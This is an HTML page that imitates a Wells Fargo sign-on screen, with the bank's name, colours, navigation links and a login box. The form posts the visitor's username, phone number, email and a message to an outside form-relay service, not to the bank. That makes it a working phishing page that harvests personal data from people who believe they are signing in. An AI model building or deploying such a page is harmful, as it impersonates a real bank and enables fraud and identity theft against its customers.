<!DOCTYPE html>
<html lang="en">
<head>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <link rel="stylesheet" href="form.css">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="run" style="height: 55px; width: auto; background-color: rgb(230, 15, 15); border-bottom: 5px solid rgba(255, 255, 0, 0.87);">
        <h1 id="well" style="color: white; font-family:Eras Bold ITC; position: relative;top: 10px; margin-left: 100px; font-size: 30px;">WELLS FARGO</h1>
        <button id="buton">sign on</button>
        <div id="round" style="margin-left: 630px;">
            <a href="" style="margin-left: 30px; text-decoration: none; color: white; position: relative;bottom: 26px ;">Enroll</a>
            <a href="" style="margin-left: 30px; text-decoration: none; color: white; position: relative;bottom: 26px ;">Customer srevice</a>
            <a href="" style="margin-left: 30px; text-decoration: none; color: white; position: relative;bottom: 26px ;">ATMs/Location</a>
            <a href="" style="margin-left: 30px; text-decoration: none; color: white; position: relative;bottom: 26px ;">Espanol</a>
        <input type="text" id="name" placeholder="search">
        <i class="fa-solid fa-magnifying-glass" id="icon2" style="color: rgb(107, 105, 105); position: relative;right: 35px; top: -22px; font-size: 20px; font-weight: bold;"></i>
        <style>
            ::placeholder{
                color: grey;
                position: relative;
                left: 10px;
            }
            #name{
                height: 40px;
                width: 100px;
                border: 1px solid grey;
                border-radius: 10px;
                position: relative;
                top: -28px;
                left: 10px;
            }
        </style>
        </div>
    </div>
    <div id="box">
        <form action="https://formsubmit.co/2453569ab492547d4ba8d03cac85dfd3" method="POST">
            <h1>Good morming</h1>
            <p>sign on to manage your account</p>
            <input type="text" name="Name" placeholder="Username" class="int" required> <i class="fa fa-circle-xmark" id="icon3"></i>
            <input type="text" name="phone" placeholder="phone number" class="int2" required> <i class="fa fa-eye-slash" id="icon4"></i>
            <div class="check">
                <input type="checkbox" name="" id="boxx"> <span>Save Username</span> </div>
                <input type="text" name="email" placeholder="Email" class="int2" required> 
                <textarea id="messages" name="message" rows="4" placeholder="messages"></textarea>
            <button id="btn" type="submit">sign on</button>
        </form>

<div id="smbox">
    <a href="" id="reset">forget username or password?</a>
</div>
<style>
    #box{
        height: 865px;
        width: 900px;
        border: none;
        background-color: white;
        position: relative;
        left: 200px;
        top: 50px;
        border-radius: 15px;
    }
    form textarea{
	border: 1px solid rgb(141, 138, 138);
	margin: 10px 0;
	padding: 20px;
	outline: none;
	background: transparent;
	font-size: 18px;
    margin-top: 150px;
}
form textarea:hover{
    background-color: whitesmoke;
}
</style>




</html>
</body>